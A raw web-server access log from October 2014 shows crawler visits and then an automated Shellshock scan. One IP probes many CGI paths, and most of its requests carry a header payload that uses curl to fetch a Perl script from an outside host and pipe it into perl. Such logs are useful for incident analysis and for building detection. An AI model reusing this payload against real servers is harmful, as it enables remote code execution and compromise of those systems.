"Googlebot-Image/1.0" +220.181.108.140 - - [31/Oct/2014:07:11:58 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +66.249.78.112 - - [31/Oct/2014:07:13:01 +0200] "GET /ftp/public/pictures/gallery/IMG_joutsenet.jpg HTTP/1.1" 200 157784 "-" "Googlebot-Image/1.0" +66.249.78.112 - - [31/Oct/2014:07:14:20 +0200] "GET /ftp/public/pictures/gallery/IMG_sorsakuva.jpg HTTP/1.1" 200 167893 "-" "Googlebot-Image/1.0" +66.249.78.126 - - [31/Oct/2014:07:15:54 +0200] "GET /ftp/public/pictures/gallery/IMG_sorsakuva2.jpg HTTP/1.1" 200 122659 "-" "Googlebot-Image/1.0" +66.35.84.73 - - [31/Oct/2014:07:24:52 +0200] "GET / HTTP/1.0" 200 453 "-" "-" +66.35.84.73 - - [31/Oct/2014:07:24:53 +0200] "GET / HTTP/1.0" 200 453 "-" "-" +66.35.84.73 - - [31/Oct/2014:07:24:54 +0200] "GET / HTTP/1.0" 200 490 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:24:55 +0200] "GET /cgi-sys/ HTTP/1.0" 404 446 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:24:56 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 404 463 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:24:56 +0200] "GET /cgi-sys/FormMail-clone.cgi HTTP/1.0" 404 464 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:24:56 +0200] "GET /cgi-sys/suspendedpage.cgi HTTP/1.0" 404 463 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:24:57 +0200] "GET /xul/ HTTP/1.0" 404 442 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:24:54 +0200] "GET /cgi-bin/ HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:24:57 +0200] "GET /cgi-bin/status HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:24:57 +0200] "GET /tmUnblock.cgi HTTP/1.0" 404 451 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:24:58 +0200] "GET /gitweb/ HTTP/1.0" 404 445 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:24:58 +0200] "GET /gitweb.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:24:59 +0200] "GET /gitweb/gitweb.cgi HTTP/1.0" 404 455 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:00 +0200] "GET /cgi-bin/php HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:00 +0200] "GET /cgi-bin/php5 HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:01 +0200] "GET /cgi-bin/php4 HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:02 +0200] "GET /cgi-bin/php-cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:02 +0200] "GET /cgi-bin/php.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:02 +0200] "GET /cgi-bin/firmwarecfg HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:03 +0200] "GET /cgi-bin/%2f/admin.html HTTP/1.0" 404 458 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:03 +0200] "GET /cgi-bin/admin.html HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:03 +0200] "GET /cgi-bin/test-cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:04 +0200] "GET /sys-cgi HTTP/1.0" 404 445 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:04 +0200] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.0" 404 474 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:04 +0200] "GET /cgi-bin/tree.php HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:05 +0200] "GET /cgi-bin/ICuGI/EST/blast_detail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:05 +0200] "GET /cgi-bin/hello HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:05 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 464 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:06 +0200] "GET /cgi-bin/w3mman2html.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:08 +0200] "GET /wwwboard/wwwboard.cgi HTTP/1.0" 404 459 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:08 +0200] "GET /wwwboard.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:09 +0200] "GET /wwwadmin.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:10 +0200] "GET /webtools/bonsai/showcheckins.cgi HTTP/1.0" 404 470 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:11 +0200] "GET /webtools/bonsai/cvsqueryform.cgi HTTP/1.0" 404 470 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:11 +0200] "GET /webtools/bonsai/cvsquery.cgi HTTP/1.0" 404 466 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:11 +0200] "GET /webtools/bonsai/cvslog.cgi HTTP/1.0" 404 464 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:13 +0200] "GET /webtools/bonsai/ccvsblame.cgi HTTP/1.0" 404 467 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:13 +0200] "GET /Web_Store/web_store.cgi HTTP/1.0" 404 461 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:13 +0200] "GET /webtools/bonsai/cvsblame.cgi HTTP/1.0" 404 466 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:13 +0200] "GET /users/scripts/submit.cgi HTTP/1.0" 404 462 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:14 +0200] "GET /userreg.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:14 +0200] "GET /upload.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:15 +0200] "GET /test.cgi HTTP/1.0" 404 446 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:17 +0200] "GET /technote/print.cgi HTTP/1.0" 404 456 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:17 +0200] "GET /submit.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:17 +0200] "GET /siteUserMod.cgi HTTP/1.0" 404 453 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:18 +0200] "GET /site_searcher.cgi HTTP/1.0" 404 455 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:19 +0200] "GET /shop/normal_html.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:20 +0200] "GET /SetSecurity.shmHTTP/1.0" 404 221 "-" "-" +66.35.84.73 - - [31/Oct/2014:07:25:20 +0200] "GET /setpasswd.cgi HTTP/1.0" 404 451 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:21 +0200] "GET /servers/link.cgi HTTP/1.0" 404 454 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:21 +0200] "GET /scancfg.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:22 +0200] "GET /sampleposteddata.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:24 +0200] "GET /sample03.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:24 +0200] "GET /sample02.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:25 +0200] "GET /sample01.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:29 +0200] "GET /quikstore.cgi HTTP/1.0" 404 451 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:30 +0200] "GET /pub/english.cgi HTTP/1.0" 404 453 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:30 +0200] "GET /process_bug.cgi HTTP/1.0" 404 453 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:32 +0200] "GET /photodata/manage.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:32 +0200] "GET /photo/manage.cgi HTTP/1.0" 404 454 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:32 +0200] "GET /parse_xml.cgi HTTP/1.0" 404 451 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:35 +0200] "GET /newsletter.shHTTP/1.0" 404 219 "-" "-" +66.35.84.73 - - [31/Oct/2014:07:25:35 +0200] "GET /newpro.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:39 +0200] "GET /ministats/admin.cgi HTTP/1.0" 404 457 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:43 +0200] "GET /left.cgi HTTP/1.0" 404 446 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:44 +0200] "GET /infosrch.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:46 +0200] "GET /html/cgi-bin/cgicsoHTTP/1.0" 404 225 "-" "-" +66.35.84.73 - - [31/Oct/2014:07:25:46 +0200] "GET /hndUnblock.cgi HTTP/1.0" 404 452 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:48 +0200] "GET /Gozila.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:48 +0200] "GET /fcgi-bin/echo2HTTP/1.0" 404 220 "-" "-" +66.35.84.73 - - [31/Oct/2014:07:25:48 +0200] "GET /fcgi-bin/echoHTTP/1.0" 404 219 "-" "-" +66.35.84.73 - - [31/Oct/2014:07:25:50 +0200] "GET /ez2000/ezboard.cgi HTTP/1.0" 404 456 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:52 +0200] "GET /emumail.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:52 +0200] "GET /edittag/edittag.cgi HTTP/1.0" 404 457 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:25:56 +0200] "GET /dcforum/dcforum.cgi HTTP/1.0" 404 457 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:26:00 +0200] "GET /CSNews.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:26:06 +0200] "GET /cgi-sys/realsignup.cgi HTTP/1.0" 404 460 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:26:09 +0200] "GET /cgi-sys/mchat.cgi HTTP/1.0" 404 455 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:26:11 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 404 463 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:26:14 +0200] "GET /cgi-sys/addalink.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:26:19 +0200] "GET /cgi-bin/wrap.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:26:26 +0200] "GET /cgi-bin/webmail/html/emumail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:26:27 +0200] "GET /cgi-bin/webdist.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:26:32 +0200] "GET /cgi-bin/vpasswd.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:26:49 +0200] "GET /cgi-bin/test.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:26:50 +0200] "GET /cgi-bin/test-cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:26:55 +0200] "GET /cgi-bin/store.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:26:56 +0200] "GET /cgi-bin/spin_client.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:26:57 +0200] "GET /cgi-bin/sojourn.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:26:58 +0200] "GET /cgi-bin/snorkerz.batHTTP/1.0" 503 323 "-" "-" +66.35.84.73 - - [31/Oct/2014:07:26:59 +0200] "GET /cgi-bin/smartsearch.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:27:03 +0200] "GET /cgi-bin/shopplus.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:27:04 +0200] "GET /cgi-bin/shop.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:27:05 +0200] "GET /cgi-bin/search/search.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:27:09 +0200] "GET /cgi-bin/sbcgi/sitebuilder.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:27:10 +0200] "GET /cgi-bin/robadmin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:27:10 +0200] "GET /cgi-bin/responder.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:27:13 +0200] "GET /cgi-bin/ratlog.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:27:16 +0200] "GET /cgi-bin/publisher/search.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:27:16 +0200] "GET /cgi-bin/profile.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:27:18 +0200] "GET /cgi-bin/printenvHTTP/1.0" 503 323 "-" "-" +66.35.84.73 - - [31/Oct/2014:07:27:19 +0200] "GET /cgi-bin/postcards.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:27:23 +0200] "GET /cgi-bin/photo/manage.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:27:24 +0200] "GET /cgi-bin/phf.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:27:26 +0200] "GET /cgi-bin/pfdisplay.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:27:31 +0200] "GET /cgi-bin/nph-test.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:27:43 +0200] "GET /cgi-bin/mt-static/mt-load.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:27:44 +0200] "GET /cgi-bin/mrtg.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:27:44 +0200] "GET /cgi-bin/mojo/mojo.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:27:47 +0200] "GET /cgi-bin/mini_logger.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:27:50 +0200] "GET /cgi-bin/mailnews.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:27:57 +0200] "GET /cgi-bin/logit.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:28:00 +0200] "GET /cgi-bin/loadpage.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:28:01 +0200] "GET /cgi-bin/journal.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:28:01 +0200] "GET /cgi-bin/jammail.plHTTP/1.0" 503 323 "-" "-" +66.35.84.73 - - [31/Oct/2014:07:28:03 +0200] "GET /cgi-bin/ImageFolio/admin/admin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:28:08 +0200] "GET /cgi-bin/htsearch.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:28:14 +0200] "GET /cgi-bin/handlerHTTP/1.0" 503 323 "-" "-" +66.35.84.73 - - [31/Oct/2014:07:28:16 +0200] "GET /cgi-bin/gm.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.35.84.73 - - [31/Oct/2014:07:28:17 +0200] "GET /cgi-bin/gm-authors.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl 